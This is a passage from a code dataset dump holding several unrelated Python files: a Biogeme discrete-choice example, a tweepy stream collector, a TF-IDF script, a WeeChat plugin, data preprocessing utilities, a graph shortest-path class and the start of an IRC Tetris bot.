pd.read_csv('swissmetro.dat', '\\t')\ndatabase = db.Database('swissmetro', df)\n\n# They are organized as panel data. The variable ID identifies each individual.\ndatabase.panel(\"ID\")\n\n# The Pandas data structure is available as database.data. Use all the\n# Pandas functions to invesigate the database\n#print(database.data.describe())\n\n# The following statement allows you to use the names of the variable\n# as Python variable.\nglobals().update(database.variables)\n\n# Removing some observations can be done directly using pandas.\n#remove = (((database.data.PURPOSE != 1) &\n# (database.data.PURPOSE != 3)) |\n# (database.data.CHOICE == 0))\n#database.data.drop(database.data[remove].index,inplace=True)\n\n# Here we use the \"biogeme\" way for backward compatibility\nexclude = ((PURPOSE != 1) * (PURPOSE != 3) + (CHOICE == 0)) > 0\ndatabase.remove(exclude)\n\n# Parameters to be estimated. One version for each latent class.\nnumberOfClasses = 2\nB_COST = [Beta(f'B_COST_class{i}', 0, None, None, 0) for i in range(numberOfClasses)]\n\n# Define a random parameter, normally distributed across individuals,\n# designed to be used for Monte-Carlo simulation\nB_TIME = [Beta(f'B_TIME_class{i}', 0, None, None, 0) for i in range(numberOfClasses)]\n\n# It is advised not to use 0 as starting value for the following parameter.\nB_TIME_S = [Beta(f'B_TIME_S_class{i}', 1, None, None, 0) for i in range(numberOfClasses)]\nB_TIME_RND = [B_TIME[i] + B_TIME_S[i] * bioDraws(f'B_TIME_RND_class{i}', 'NORMAL_ANTI')\n for i in range(numberOfClasses)]\n\n# We do the same for the constants, to address serial correlation.\nASC_CAR = [Beta(f'ASC_CAR_class{i}', 0, None, None, 0) for i in range(numberOfClasses)]\nASC_CAR_S = [Beta(f'ASC_CAR_S_class{i}', 1, None, None, 0) for i in range(numberOfClasses)]\nASC_CAR_RND = [ASC_CAR[i] + ASC_CAR_S[i] * bioDraws(f'ASC_CAR_RND_class{i}', 'NORMAL_ANTI')\n for i in range(numberOfClasses)]\n\nASC_TRAIN = [Beta(f'ASC_TRAIN_class{i}', 0, None, None, 0) for i in range(numberOfClasses)]\nASC_TRAIN_S = [Beta(f'ASC_TRAIN_S_class{i}', 1, None, None, 0) for i in range(numberOfClasses)]\nASC_TRAIN_RND = [ASC_TRAIN[i] + ASC_TRAIN_S[i] * bioDraws(f'ASC_TRAIN_RND_class{i}', 'NORMAL_ANTI')\n for i in range(numberOfClasses)]\n\nASC_SM = [Beta(f'ASC_SM_class{i}', 0, None, None, 1) for i in range(numberOfClasses)]\nASC_SM_S = [Beta(f'ASC_SM_S_class{i}', 1, None, None, 0) for i in range(numberOfClasses)]\nASC_SM_RND = [ASC_SM[i] + ASC_SM_S[i] * bioDraws(f'ASC_SM_RND_class{i}', 'NORMAL_ANTI')\n for i in range(numberOfClasses)]\n\n# Class memebership probability\nPROB_class0 = Beta('PROB_class0', 0.5, 0, 1, 0)\nPROB_class1 = 1 - PROB_class0\n\n# Definition of new variables\nSM_COST = SM_CO * (GA == 0)\nTRAIN_COST = TRAIN_CO * (GA == 0)\n\n# Definition of new variables: adding columns to the database\nCAR_AV_SP = DefineVariable('CAR_AV_SP', CAR_AV * (SP != 0), database)\nTRAIN_AV_SP = DefineVariable('TRAIN_AV_SP', TRAIN_AV * (SP != 0), database)\nTRAIN_TT_SCALED = DefineVariable('TRAIN_TT_SCALED', TRAIN_TT / 100.0, database)\nTRAIN_COST_SCALED = DefineVariable('TRAIN_COST_SCALED', TRAIN_COST / 100, database)\nSM_TT_SCALED = DefineVariable('SM_TT_SCALED', SM_TT / 100.0, database)\nSM_COST_SCALED = DefineVariable('SM_COST_SCALED', SM_COST / 100, database)\nCAR_TT_SCALED = DefineVariable('CAR_TT_SCALED', CAR_TT / 100, database)\nCAR_CO_SCALED = DefineVariable('CAR_CO_SCALED', CAR_CO / 100, database)\n\n# In class 0, it is assumed that the time coefficient is zero\nB_TIME_RND[0] = 0\n\n# Utility functions\nV1 = [ASC_TRAIN_RND[i] + B_TIME_RND[i] * TRAIN_TT_SCALED + B_COST[i] * TRAIN_COST_SCALED\n for i in range(numberOfClasses)]\nV2 = [ASC_SM_RND[i] + B_TIME_RND[i] * SM_TT_SCALED + B_COST[i] * SM_COST_SCALED\n for i in range(numberOfClasses)]\nV3 = [ASC_CAR_RND[i] + B_TIME_RND[i] * CAR_TT_SCALED + B_COST[i] * CAR_CO_SCALED\n for i in range(numberOfClasses)]\nV = [{1: V1[i],\n 2: V2[i],\n 3: V3[i]} for i in range(numberOfClasses)]\n\n# Associate the availability conditions with the alternatives\nav = {1: TRAIN_AV_SP,\n 2: SM_AV,\n 3: CAR_AV_SP}\n\n# The choice model is a discrete mixture of logit, with availability conditions\n# We calculate the conditional probability for each class\nprob = [MonteCarlo(PanelLikelihoodTrajectory(models.logit(V[i], av, CHOICE)))\n for i in range(numberOfClasses)]\n\n# Conditional to the random variables, likelihood for the individual.\nprobIndiv = PROB_class0 * prob[0] + PROB_class1 * prob[1]\n\n# We integrate over the random variables using Monte-Carlo\nlogprob = log(probIndiv)\n\n# Define level of verbosity\nlogger = msg.bioMessage()\n#logger.setSilent()\n#logger.setWarning()\nlogger.setGeneral()\n#logger.setDetailed()\n\n# Create the Biogeme object\nbiogeme = bio.BIOGEME(database, logprob, numberOfDraws=100000)\nbiogeme.modelName = '15panelDiscreteBis'\n\n# As the estimation may take a while and risk to be interrupted, we save the iterations,\n# and restore them before the estimation.\nfname = \"__15panelDiscreteBis.iters\"\nbiogeme.loadSavedIteration(filename=fname)\n# Estimate the parameters.\nresults = biogeme.estimate(saveIterations=True, file_iterations=fname)\npandasResults = results.getEstimatedParameters()\nprint(pandasResults)\n","sub_path":"examples/swissmetro/15panelDiscreteBis.py","file_name":"15panelDiscreteBis.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"213137904","text":"import sys\n\nfrom PyQt5 import QtWidgets\nfrom views.GUI import Ui_mainWindow\n\n\ndef errors():\n # Back up the reference to the exceptionhook\n sys._excepthook = sys.excepthook\n\n def my_exception_hook(exctype, value, traceback):\n # Print the error and traceback\n print(exctype, value, traceback)\n # Call the normal Exception hook after\n sys._excepthook(exctype, value, traceback)\n sys.exit(1)\n\n # Set the exception hook to our wrapping function\n sys.excepthook = my_exception_hook\n return\n\n\ndef main():\n errors()\n try:\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_mainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n except:\n print(\"Exiting\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"219244458","text":"__author__ = 'enestaylan'\n\nimport time\nfrom datetime import datetime\nimport tweepy\nfrom tweepy import Stream\nfrom Shared.IanusListener import IanusListener\nimport Shared.configs as configs\n\n\ndef getTwitterClient():\n auth = tweepy.OAuthHandler(configs.consumer_key, configs.consumer_secret)\n auth.set_access_token(configs.access_token, configs.access_token_secret)\n\n return auth\n\n\ndef beginStream(client, keyword_list):\n # twitterStream = Stream(auth=client, listener=IanusListener(filePath=\"/media/enes/LinuxD/usa42.json\"))\n twitterStream = Stream(auth=client, listener=IanusListener(filePath=\"/home/enes/Desktop/data/usa44.json\"))\n twitterStream.filter(track=keyword_list, languages=[\"en\"]) # https://github.com/tweepy/tweepy/issues/615\n\n\ndef main():\n client = getTwitterClient()\n keyword_list = getKeywords()\n\n while (True):\n try:\n beginStream(client, keyword_list)\n\n except BaseException as e:\n print(\"LOOP----\", datetime.now(), \"------\", str(e))\n time.sleep(120)\n pass\n\n\ndef getKeywords():\n trump = [\"Donald Trump\", \"@realDonaldTrump\"]\n cruz = [\"Ted Cruz\", \"@tedcruz\"]\n rubio = [\"Marco Rubio\", \"@marcorubio\"]\n carson = [\"Ben Carson\", \"@RealBenCarson\"]\n kasich = [\"John Kasich\", \"@JohnKasich\"]\n bush = [\"Jeb Bush\", \"@JebBush\"]\n\n sanders = [\"Bernie Sanders\", \"@BernieSanders\"]\n clinton = [\"Hillary Clinton\", \"@HillaryClinton\"]\n\n return trump + cruz + rubio + carson + kasich + bush + sanders + clinton\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"USA/electionStreamer.py","file_name":"electionStreamer.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165650711","text":"# open and read file \ninput('Initiating Vector Space Modeling protocol... Press any key to continue.')\nfilename = input('Within your current directory, please provide the filename: ')\nprint('\\nVectorizing documents, weighting scheme pending...') \nnewfile = open(filename, 'r')\nfilestring = newfile.readlines()\n# re-organize the information into a dicitonary with key-value pairs\nseparate_documents = {}\n# set an accumulator that will serve two purposes - dictionary key and document ID\ndoc_id = 1\n# count controlled loop to iterate each line of our corpus (each line is a document)\nfor document in filestring:\n # append each line (each document) to the list; creating a list of lists\n separate_documents[doc_id] = document\n doc_id += 1\n# generate a tf-idf representation\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n# condiotional logic for individual tokens or phrases (n-grams)\nchoice = input('Analyze tokens or n-grams? ')\nif 't' in choice.lower():\n # set a minimum document frequency threshold \n document_frequency = float(input('Select a minimum document frequency % threshold: '))\n threshold = int(document_frequency)/100 * (len(separate_documents))\n tf_idf = TfidfVectorizer(input=newfile,min_df=int(threshold),use_idf=True,stop_words='english')\n weights = tf_idf.fit_transform(separate_documents.values())\n feature_names = tf_idf.get_feature_names()\n corpus_index = [n for n in separate_documents] \n # wrap feature names and corpus index into a data frame (matrix)\n import pandas as p\n matrix = p.DataFrame(weights.todense(),index=corpus_index,columns=feature_names)\n output_file = open('tf_idf_matrix.csv', 'w')\n matrix.to_csv('tf_idf_matrix.csv')\nelif 'g' in choice.lower():\n # set a minimum document frequency threshold \n document_frequency = float(input('Select a minimum document frequency % threshold: '))\n threshold = int(document_frequency)/100 * (len(separate_documents))\n n_grams = int(input('Set an upper range for tokens that can be included in a phrase: '))\n tf_idf = TfidfVectorizer(input=newfile,min_df=int(threshold),use_idf=True,ngram_range=(2,n_grams),stop_words='english')\n weights = tf_idf.fit_transform(separate_documents.values())\n feature_names = tf_idf.get_feature_names()\n corpus_index = [n for n in separate_documents] \n # wrap feature names and corpus index into a data frame (matrix)\n import pandas as p\n matrix = p.DataFrame(weights.todense(),index=corpus_index,columns=feature_names)\n matrix.to_csv('tf_idf_matrix.csv')\n\n","sub_path":"tf_idf_matrix_csv.py","file_name":"tf_idf_matrix_csv.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"214644723","text":"import json\nfrom fluent import sender,event\nimport traceback\n\nfluent_host = '127.0.0.1'\nfluent_port = 5170 #needs to be int\n\nfluent_port = int(fluent_port)\t#just in case someone was a dummy and set it as a string\n\nsender = sender.FluentSender( tag=\"rest\", host=fluent_host, port=fluent_port )\n\ndef log_json_output( j ):\n\ttry:\n\t\tlog_json( 'output', j )\n\texcept:\n\t\ttraceback.print_exc()\ndef log_json_input( j ):\n\ttry:\n\t\tlog_json( 'input', j )\n\texcept:\n\t\ttraceback.print_exc()\n\ndef log_json( tag, j ):\n\ttry:\n#\t\ttry:\n\t\t\td = json.loads( j )\n\t\t\tsender.emit( tag, d )\n#\t\texcept JSONDecodeError:\n#\t\t\tsender.emit( tag, {\"malformed json\": j } )\n#\t\t\traise\n\texcept:\n\t\ttraceback.print_exc()\n","sub_path":"linux/poolboy/fluentd.py","file_name":"fluentd.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544752233","text":"'''\nProject: raw\nAuthors: Kevin Morris \nLicense: GPL2\nDescription: A weechat script for putting out escaped strings.\n'''\nimport weechat\nimport os\nimport re\nfrom os.path import basename, abspath, join, isfile\n\nscript_name = \"raw\"\n__authors__ = \"Kevin Morris\"\n__email__ = \"kevr@nixcode.us\"\n__version__ = \"0.1.0\"\n__license__ = \"GPL2\"\n\nfifo = ''\nconfig_dir = os.listdir(join(os.environ[\"HOME\"], \".weechat\"))\nfor f in config_dir:\n if re.search(r\"weechat_fifo_\\d+\", f):\n fifo = join(os.environ[\"HOME\"], \".weechat\", f)\n\ndef init():\n weechat.register(script_name, __authors__, __version__, __license__,\n \"{} - A raw string output script\".format(script_name), \"\", \"\")\n weechat.hook_command(\"raw\", \"Output a raw escaped string.\", \"\", \"\",\n \"\", \"command\", \"\")\n\n weechat.prnt(weechat.current_buffer(), \"Using fifo: {}\".format(fifo))\n\ndef command(data, buffer, args):\n\n with open(fifo, \"w\") as fh:\n fh.write(\"*{}\\n\".format(args.decode('UTF-8')))\n\n return weechat.WEECHAT_RC_OK\n\nif __name__ == \"__main__\":\n init()\n\n","sub_path":"python/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363643255","text":"import pandas as pd\nimport numpy as np\nimport glob\nimport warnings\nwarnings.simplefilter('ignore')\n\npath = r'data'\ncsv_files = glob.glob(path + \"/*.csv\")\ndata_files = glob.glob(path + \"/*.data\")\n\nli = {}\n\nfor filename in csv_files:\n print(filename)\n if filename[len(path)+1:-4] == \"naval_propulsion\":\n df = pd.read_csv(filename, header = None, sep = \" \")\n else :\n df = pd.read_csv(filename, header = None)\n li[filename[len(path)+1:-4]] = df\n \nfor filename in data_files:\n print(filename)\n df = pd.read_csv(filename, header = None)\n li[filename[len(path)+1:-5]] = df\n\n\ndef process(df, cy, cdrop = [], header = False, dummies = []):\n if header :\n df = df.drop(0, axis = 0)\n ndummies = []\n for d in dummies :\n ndrop = 1 if d > cy else 0\n for c in cdrop :\n if d > c :\n ndrop+= 1\n ndummies.append(d-ndrop)\n cols = [x for x in range(df.shape[1])]\n for c in cdrop:\n cols.remove(c)\n df1 = df.iloc[:, cols].dropna(axis = 0)\n ncy = cy\n for c in cdrop :\n if cy > c :\n ncy-=1\n Y = df1.iloc[:, ncy]\n cols1 = [x for x in range(df1.shape[1])]\n cols1.remove(ncy)\n df2 = df1.iloc[:, cols1]\n for d in ndummies : \n dcod = pd.get_dummies(df2.iloc[:, d], drop_first = True)\n dcod = dcod.set_axis([\"cat_\"+str(d)+str(i) for i in dcod.columns], axis = 1)\n df2 = df2.join(dcod)\n cols = [x for x in range(df2.shape[1])]\n rmcols = ndummies\n for r in rmcols :\n cols.remove(r)\n X = df2.iloc[:, cols]\n X = X.astype(float)\n Y = Y.astype(float)\n return X, Y\n\n\ndFrame = {\"blog\" : {\"cy\" : 280, \"cdrop\" : [277, 54, 262]},\n \"fbmetrics\" : {\"cy\" : 18, \"cdrop\" : [15, 16, 17], \"header\" : True, \"dummies\" : [1]},\n \"fbcom1\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"fbcom2\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"fbcom3\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"fbcom4\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"fbcom5\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"forestfires\" : {\"cy\" : 12, \"header\" : True, \"dummies\" : [2, 3]},\n \"turbine2011\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"turbine2012\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"turbine2013\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"turbine2014\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"turbine2015\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"heart_failure\" : {\"cy\" : 12, \"header\" : True},\n \"naval_propulsion\" : {\"cy\" : 16, \"cdrop\" : [17]},\n \"aquatic_toxicity\" : {\"cy\" : 8},\n \"indoor\" : {\"cy\" : 520, \"cdrop\" : [521, 522, 523], \"header\" : True},\n \"news\" : {\"cy\" : 60, \"cdrop\" : [0, 1], \"header\" : True},\n \"parkinson\" : {\"cy\" : 5, \"cdrop\" : [4]},\n \"redwine\" : {\"cy\" : 11, \"header\" : True},\n \"whitewine\" : {\"cy\": 11, \"header\" : True},\n \"student-mat\": {\"cy\" : 32, \"cdrop\" : [30, 31], \"header\" : True, \"dummies\" : [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 15, 16, 17, 18, 19, 20, 21, 22]},\n \"student-por\" : {\"cy\" : 32, \"cdrop\" : [30, 31], \"header\" : True, \"dummies\" : [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 15, 16, 17, 18, 19, 20, 21, 22]},\n \"superconduct\" : {\"cy\" : 81, \"header\" : True},\n \"year\" : {\"cy\" : 0},\n \"temperature\" : {\"cy\" : 23, \"cdrop\" : [1, 24], \"header\" : True},\n \"communities\" : {\"cy\" : 127, \"cdrop\" : [0, 1, 2, 3, 4]},\n \"compressive\" : {\"cy\" : 8, \"header\" : True},\n \"residential\" : {\"cy\" : 107, \"cdrop\" : [108], \"header\" : True},\n \"carbon\" : {\"cy\" : 5, \"cdrop\" : [6, 7], \"header\" : True},\n \"yacht\" : {\"cy\" : 6},\n \"wave_adelaide\" : {\"cy\" : 48},\n \"wave_tasmania\" : {\"cy\" : 48},\n \"wave_perth\" : {\"cy\" : 48},\n \"wave_sydney\" : {\"cy\" : 48}}\n\n\ndX = {}\ndY = {}\nfor dfname in dFrame.keys():\n X, Y = process(li.get(dfname), dFrame[dfname][\"cy\"], dFrame[dfname].get(\"cdrop\", []),\n dFrame[dfname].get(\"header\", False), dFrame[dfname].get(\"dummies\", []))\n dX[dfname] = X.to_numpy()\n dY[dfname] = Y.to_numpy()\n\n","sub_path":"data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649032361","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-x86_64/egg/DS_Store_Cleaner/__main__.py\n# Compiled at: 2020-01-13 11:16:07\n# Size of source mod 2**32: 263 bytes\nimport sys\nfrom .DS_Store_Cleaner import *\n\ndef main():\n if len(sys.argv) > 1:\n files = all_file(sys.argv[1])\n remove_file(files)\n else:\n files = all_file(os.getcwd())\n remove_file(files)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/DS_Store_Cleaner-0.1-py3.7/__main__.cpython-37.py","file_name":"__main__.cpython-37.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"485205589","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport demjson\nimport json\n\nurl=\"http://sclub.jd.com/comment/productPageComments.action?productId=10395644636&score=0&sortType=3&page=0&pageSize=10&callback=fetchJSON_comment98vv83110\"\nhtml=urlopen(url).read().decode(\"gbk\")\n# print(html)\n# # print(html)\n# lsize=html.find('{')\n# rsize=html.rfind('}')+1\n# json1=json.loads(html[lsize:rsize])\n\n# hotcomm=json1[\"hotCommentTagStatistics\"]\n# for comm in hotcomm:\n# \tprint(comm[\"name\"]+\": \"+str(comm[\"count\"]))\n# # print(json1[\"hotCommentTagStatistics\"])\n# # # print(json1.keys())\n# # # json1 = demjson.encode(html)\n# print(json.dumps(json1, sort_keys=True, indent=4))\nlsize=html.find('{')\nrsize=html.rfind('}')+1\nhtml=html[lsize:rsize]\n\n\njson1=json.loads(html)\nprint(\"全部评论 : \"+str(json1[\"productCommentSummary\"][\"commentCount\"]))\nprint(\"好 评 : \"+str(json1[\"productCommentSummary\"][\"goodCount\"]))\nprint(\"中 评 : \"+str(json1[\"productCommentSummary\"][\"generalCount\"]))\nprint(\"差 评 : \"+str(json1[\"productCommentSummary\"][\"poorCount\"]))\nprint(\"------------\")\nprint()\nhotcomm=json1[\"hotCommentTagStatistics\"]\nfor comm in hotcomm:\n\tprint(comm[\"name\"]+\": \"+str(comm[\"count\"]))\n","sub_path":"jingdong/test/comm.py","file_name":"comm.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148612234","text":"import datetime\nimport os\nimport subprocess\nimport time\nimport traceback\n\nimport constant\n\n\ndef tranlatePath(path):\n return '\\\"' + path + '\\\"'\n\n\ndef delatyClose():\n end = constant.delay\n for x in range(end):\n print(end - x)\n time.sleep(1)\n\n\ndef get_popen(cmd):\n # creationflags 屏蔽adb命令\n return subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, creationflags=0x08000000)\n\n\ndef getCommodText(cmd):\n text = ''\n try:\n # creationflags 屏蔽adb命令\n popen = get_popen(cmd)\n out, err = popen.communicate()\n\n for line in out.splitlines():\n text = text + line.decode('utf-8') + '\\n'\n\n if text == '' and err:\n for line in err.splitlines():\n text = text + line.decode('utf-8') + '\\n'\n\n except Exception as e:\n text = traceback.format_exc()\n return text\n\n\ndef getCurFormatTime():\n now_time = datetime.datetime.now()\n return datetime.datetime.strftime(now_time, '%Y-%m-%d %H:%M:%S')\n\n\ndef delete_file(path):\n if os.path.exists(path):\n try:\n os.remove(path)\n return True\n except Exception as e:\n f = open(path, encoding=\"utf-8\")\n f.close()\n os.remove(path)\n return False\n\n\nif __name__ == '__main__':\n print('util.py')\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382451347","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nfrom copy import deepcopy\n\n'''\nklasa zawierajaca informacje o ulicach:\n-dlugosc\n-zabrudzenie\n-macierz polaczen\n-wektor posprzatanych ulic\n'''\n\n\nclass Streets:\n def __init__(self):\n\n self.n = 40\n\n self.A = self.generate_new_A()\n\n self.L = self.generate_new_L(10, 80)\n\n self.G = self.generate_new_G()\n\n self.r = np.sum(np.triu(self.A, 1)) # liczba ulic\n\n self.fw_graph = self.Floyd_Warshall()\n\n\n def generate_new_A(self):\n matrix = np.random.rand(self.n, self.n)\n u_matrix = np.triu(matrix, 1)\n l_matrix = u_matrix.T\n sym_matrix = u_matrix + l_matrix\n new_A = np.round(sym_matrix)\n return new_A\n\n def generate_new_L(self, dist_min, dist_max):\n dist = np.random.randint(dist_min, dist_max, size=(self.n, self.n))\n u_dist = np.triu(dist, 1)\n l_dist = u_dist.T\n dist = u_dist + l_dist\n new_L = np.multiply(self.A, dist)\n return new_L\n\n def generate_new_G(self):\n g_matrix = np.random.randint(1, 4, (self.n, self.n))\n u_g_matrix = np.triu(g_matrix, 1)\n l_g_matrix = u_g_matrix.T\n g_matrix = u_g_matrix + l_g_matrix\n new_G = np.multiply(self.A, g_matrix)\n return new_G\n\n def update_r(self):\n self.r = np.sum(np.triu(self.A, 1))\n\n def load_matrices(self, folder_path):\n temp1 = temp2 = temp3 = 0\n matrices = {'A': temp1, 'G': temp2, 'L': temp3}\n for key, value in matrices.items():\n file_path = folder_path + key + '.xlsx'\n df = pd.read_excel(file_path)\n matrices[key] = df.to_numpy()\n self.A = matrices['A']\n self.G = matrices['G']\n self.L = matrices['L']\n\n def save_matrices(self, folder_path):\n matrices = {'A': self.A, 'G': self.G, 'L': self.L}\n for key, value in matrices.items():\n file_path = folder_path + key + '.xlsx'\n df = pd.DataFrame(data=value)\n writer = pd.ExcelWriter(file_path, engine='xlsxwriter')\n df.to_excel(writer, sheet_name='data', index=False)\n writer.save()\n\n def Floyd_Warshall(self): # Floyd-Warshall lub djikstra z BFS,\n G_copy = deepcopy(self.G)\n # path reconstruction matrix\n fw_graph = np.zeros(self.G.shape)\n for i in range(0, self.n):\n for j in range(0, self.n):\n fw_graph[i, j] = i\n if G_copy[i, j] == 0:\n fw_graph[i, j] = -30000\n G_copy[i, j] = 30000 # set zeros to any large number which is bigger then the longest way\n\n for k in range(0, self.n):\n for i in range(0, self.n):\n for j in range(0, self.n):\n if G_copy[i, j] > G_copy[i, k] + G_copy[k, j]:\n G_copy[i, j] = G_copy[i, k] + G_copy[k, j]\n fw_graph[i, j] = fw_graph[k, j]\n return fw_graph\n","sub_path":"Street.py","file_name":"Street.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"88759166","text":"import random\nimport json\nimport itertools\n\nfrom bot.events import command, Callback\nfrom util.text import xchat_colour\n\n\nbraille = \"⠀⠁⠈⠉⠂⠃⠊⠋⠐⠑⠘⠙⠒⠓⠚⠛⠄⠅⠌⠍⠆⠇⠎⠏⠔⠕⠜⠝⠖⠗⠞⠟⠠⠡⠨⠩⠢⠣⠪⠫⠰⠱⠸⠹⠲⠳⠺⠻⠤⠥⠬⠭⠦⠧⠮⠯⠴⠵⠼⠽⠶⠷⠾⠿⡀⡁⡈⡉⡂⡃⡊⡋⡐⡑⡘⡙⡒⡓⡚⡛⡄⡅⡌⡍⡆⡇⡎⡏⡔⡕⡜⡝⡖⡗⡞⡟⡠⡡⡨⡩⡢⡣⡪⡫⡰⡱⡸⡹⡲⡳⡺⡻⡤⡥⡬⡭⡦⡧⡮⡯⡴⡵⡼⡽⡶⡷⡾⡿⢀⢁⢈⢉⢂⢃⢊⢋⢐⢑⢘⢙⢒⢓⢚⢛⢄⢅⢌⢍⢆⢇⢎⢏⢔⢕⢜⢝⢖⢗⢞⢟⢠⢡⢨⢩⢢⢣⢪⢫⢰⢱⢸⢹⢲⢳⢺⢻⢤⢥⢬⢭⢦⢧⢮⢯⢴⢵⢼⢽⢶⢷⢾⢿⣀⣁⣈⣉⣂⣃⣊⣋⣐⣑⣘⣙⣒⣓⣚⣛⣄⣅⣌⣍⣆⣇⣎⣏⣔⣕⣜⣝⣖⣗⣞⣟⣠⣡⣨⣩⣢⣣⣪⣫⣰⣱⣸⣹⣲⣳⣺⣻⣤⣥⣬⣭⣦⣧⣮⣯⣴⣵⣼⣽⣶⣷⣾⣿\"\n\ndef draw_braille(board):\n size = (len(board[0]), len(board))\n def getpix(y, x):\n try:\n return board[y][x]\n except IndexError:\n return 0\n lines = []\n for y in range(size[1]//4 + bool(size[1] % 4)):\n line = []\n row = y * 4\n for x in range(size[0]//2 + bool(size[0] % 2)):\n col = x * 2\n index = 0\n index += getpix(row, col)\n index += 2*getpix(row, col+1)\n index += 4*getpix(row+1, col)\n index += 8*getpix(row+1, col+1)\n index += 16*getpix(row+2, col)\n index += 32*getpix(row+2, col+1)\n index += 64*getpix(row+3, col)\n index += 128*getpix(row+3, col+1)\n line.append(braille[index])\n lines.append(\"\".join(line))\n return \"\\n\".join(lines)\n \n\ndef draw_half(board):\n size = (len(board[0]), len(board))\n def getpix(y, x):\n try:\n return board[y][x]\n except IndexError:\n return 0\n return \"\\n\".join(\"\".join(\"\\x03%.2d,%.2d▄\" % (getpix(2*y+1, x), getpix(2*y, x))\n for x in range(size[0]))\n for y in range(size[1]//2 + bool(size[1] % 2)))\n\n\nclass Game(object):\n COLORS = [10, 6, 3, 8, 9, 13, 11, 7, 2, 4]\n PIECES = [[[1, 1, 1, 1]],\n [[1, 1, 1], [0, 0, 1]],\n [[1, 1, 1], [1, 0, 0]],\n [[1, 1], [1, 1]],\n [[0, 1, 1], [1, 1, 0]],\n [[1, 1, 1], [0, 1, 0]],\n [[1, 1, 0], [0, 1, 1]],\n None] \n\n def __init__(self, name, size=(10, 12), board=None, players=None):\n self.name = name\n self.size = size\n if board is None:\n board = [[None for i in range(size[0])] for j in range(size[1])]\n self.board = board\n if players is None:\n players = {}\n self.players = players\n\n def serialise(self):\n return {\"size\": list(self.size), \"board\": self.board, \"players\": self.players}\n\n def rand_piece(self):\n return random.choice(self.PIECES)\n\n def add_player(self, key, name):\n self.players[key] = {\"name\":name, \"score\": 0, \"pieces\": [self.rand_piece(), self.rand_piece()], \"color\": xchat_colour(name)}\n\n \n\n\nclass Tetris(Callback):\n TETRIS_SAVED = \"tetris_games.json\"\n\n def __init__(self, server):\n self.save_file = server.get_config_dir(self.TETRIS_SAVED)\n try:\n with open(self.save_file) as f:\n self.games = json.load(f)\n self.games = {k: Game(k, *v) for k, v in self.games.items()}\n except:\n self.games = {}\n\n self.server = server\n super().__init__(server)\n\n def init_game(self, channel):\n chan = self.server.lower(channel)\n if chan not in self.games:\n self.games[chan] = Game(channel)\n return self.games[chan]\n\n def ensure_created(self, channel, user):\n game = self.init_game(channel)\n luser = self.server.lower(user)\n if luser not in game.players:\n game.add_player(luser, user)\n return game\n\n\n def draw(self, x): return draw_half(x)\n\n def draw_piece(self, x): return draw_braille(x)\n \n def format_user(self, player):\n currentp, nextp = player['pieces'][0], player['pieces'][1]\n if currentp is None:\n currentp = [\"\\x034💣\"]\n else:\n currentp = self.draw([[player['color'] if j else j for j in i] for i in currentp]).split(\"\\n\")\n if nextp is None:\n nextp = [\"\\x034💣\"]\n else:\n nextp = self.draw([[player['color'] if j else j for j in i] for i in nextp]).split(\"\\n\")\n currentpl, nextpl = len(currentp), len(nextp)\n if currentpl > nextpl:\n nextp.extend([\" \" * (len(player['pieces'][1]) if player['pieces'][1] is not None else 1)] * (currentpl - nextpl))\n else:\n currentp.extend([\" \" * (len(player['pieces'][0]) if player['pieces'][0] is not None else 1)] * (nextpl - currentpl))\n height = max(currentpl, 